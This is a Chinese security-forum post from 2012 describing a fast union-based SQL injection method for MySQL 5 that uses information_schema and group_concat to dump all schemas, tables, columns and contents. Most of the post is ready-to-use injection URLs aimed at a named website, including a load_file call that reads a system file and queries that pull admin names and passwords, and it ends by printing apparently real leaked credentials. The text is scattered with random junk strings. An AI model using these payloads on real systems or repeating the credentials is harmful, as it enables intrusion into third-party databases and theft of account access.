找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2285|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似% Y6 b0 ^2 ]% `
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
5 n& k, K% {+ y4 J. S' U
& ]* I$ \" e0 c5 Y9 F9 l& Q% a) {; d
: [  a8 D( z, k0 ~7 k优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入) c) u# @$ S7 D$ r+ ]

$ ^! c* s( N9 d6 o缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
- C7 c$ S7 H1 [% U: Q( l7 b9 c. P0 z+ s2 B9 z
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示' E1 v* X" @6 M
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
0 H6 w$ m' d: B4 Y& r6 L0 ~" V
" w: |" G: f, g7 K8 uhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
0 J0 E8 D$ t! \* G& U+ @- _7 n2 d7 x) ?
读出所有库:
" D- {; X9 }3 a% qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA/ a" W- _1 }0 {. A7 }8 U8 J# p
# P* j! z' U$ U
$ b8 p1 Y6 x. b5 I7 S+ \! I0 }

/ Q3 Y1 m  U! {4 {0 w0 A1 T读出所有表:
) a% f; @; k9 @/ p4 S: ]8 thttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()- \) _' I- I* f  g4 f
6 E5 G, a1 e- C
读出所有表字段:
( x! N+ \7 [8 u3 k. C7 dhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
* |: U3 D. X3 X& |" k1 X$ S*/ (97,100,109,105,110)为admin的ascii码 依次类推% O9 O9 n/ |  k7 Y$ H! V
* u+ w: p$ g0 c
读出所有表字段里的内容:
* f5 L$ a( j, I; _' {, X7 Ehttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin8 I" w8 F5 P* i% r: t9 v
" O: G& Z! c, G- ?

! k4 q; r3 L/ e* e, R4 d, D9 w$ \5 @% i9 y) G0 h; O
" B, C* W6 u+ W9 [
" |4 C& g( b. s5 M. w( S, _2 J

1 d9 ~2 N7 S3 f# \+ Yhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
7 y6 e/ Q/ O- O2 c9 V
5 m8 [' d- `6 X  Z! C8 d
  h( `# ^1 @7 v1 S4 H) F$ whttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
9 }5 ?! M$ _- d7 F$ [5 i  v) ~. }  g8 M& L3 E6 i6 g
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
* r- G$ m9 K- X
# i' q3 Q! @. s( G$ {. ?+ t+ r; N2 Y6 O' K3 a: g) [6 |
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
7 z4 \8 W7 [6 x$ |2 @/ `. z& N7 e
. P; b3 [! z- L$ L. q' d9 E4 z9 w# {3 A. p( `* E
        webmaster:dzb521123,simlab:simadmin20043233$ \7 N: H6 B. K- y+ h* b4 G8 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表